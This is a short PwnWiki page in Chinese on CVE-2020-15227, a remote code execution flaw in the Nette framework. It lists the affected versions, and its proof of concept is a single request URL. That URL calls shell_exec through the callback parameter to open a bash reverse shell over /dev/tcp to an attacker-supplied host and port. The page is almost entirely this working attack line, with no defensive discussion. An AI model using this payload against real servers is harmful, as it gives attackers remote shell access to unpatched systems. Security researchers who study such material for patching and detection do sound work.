🔔️我們已經出現了財務危機,請不要攔截廣告,感謝您的支持🙏🏻️

CVE-2020-15227 遠程代碼執行漏洞

From PwnWiki
Jump to navigation Jump to search

影響版本:

Nette versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, 3.0.6

POC:

/nette.micro?callback=shell_exec&cmd=bash%20-i%20>&%20/dev/tcp/'+lhost+'/'+lport+'0>&1